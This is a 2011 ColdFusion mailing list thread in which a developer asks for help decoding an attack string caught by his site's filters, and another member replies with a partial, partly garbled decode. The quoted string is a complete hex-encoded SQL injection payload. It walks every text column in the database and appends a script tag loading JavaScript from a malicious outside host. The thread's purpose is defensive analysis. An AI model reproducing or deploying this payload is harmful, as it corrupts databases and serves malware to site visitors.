Re: Can anyone decode this?

[John M Bliss]

http://www.dolcevie.com/js/converter.html

On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis <ch...@asitv.com> wrote:

>
> John, what did you do to decode this? Thanks, Che
>
> -----Original Message-----
> From: John M Bliss [mailto:bliss.j...@gmail.com]
> Sent: Friday, May 13, 2011 10:34 AM
> To: cf-talk
> Subject: Re: Can anyone decode this?
>
>
> Patial:
>
> DECLARE @T varchar(255),@C varcha?"?C?????DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
> select a.name,b.name from
> sysobjects????7?66??V??2?"?v?W&R????C?"??B???B???xtype='u' and (b.xtype=99
> or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??cr????T??Table_Cursor FETCH NEXT
> FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
> ['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
> http://sdo.1000mg.cn/csrss/w.js
> "></sc?&??C?????rr?v?W&R?r??2?r???B????R?rrR?
> ></title><script
> src="http://sdo.1000m?r?6??77'72?r??2#???67&??C?????rrr?dUD?H NEXT FROM
> Table_Cursor INTO @T,@C E??B?4??4R?F?&?U?7W'6?"?DT????4?DR?F?&??_Cursor
>
> On Fri, May 13, 2011 at 9:31 AM, Che Vilnonis <ch...@asitv.com> wrote:
>
> >
> > Can anyone decode this? This was a URL attack that was caught by some
> > custom code. I tried decoding the string at
> > http://meyerweb.com/eric/tools/dencoder/ but had no luck.
> >
> > 113|736;DECLARE @S CHAR(4000);SET
> >
> > @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172
> > 636861
> >
> > 72283430303029204445434C415245205461626C655F437572736F7220435552534F52
> > 20464F
> >
> > 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65
> > 637473
> >
> > 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E64
> > 20612E
> >
> > 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970
> > 653D33
> >
> > 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
> > 454E20
> >
> > 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C65
> > 5F4375
> >
> > 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455
> > 533D30
> >
> > 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B
> > 272B40
> >
> > 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C7363726970742073
> > 72633D
> >
> > 22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C
> > 2F7363
> >
> > 726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027
> > 272522
> >
> > 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E3130
> > 30306D
> >
> > 672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946
> > 455443
> >
> > 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40
> > 432045
> >
> > 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461
> > 626C65
> > 5F437572736F72 AS CHAR(4000));EXEC(@S);
> >
> > Thanks, Che
> >
> >
> >
> >
> >
>
>
>
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344494
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm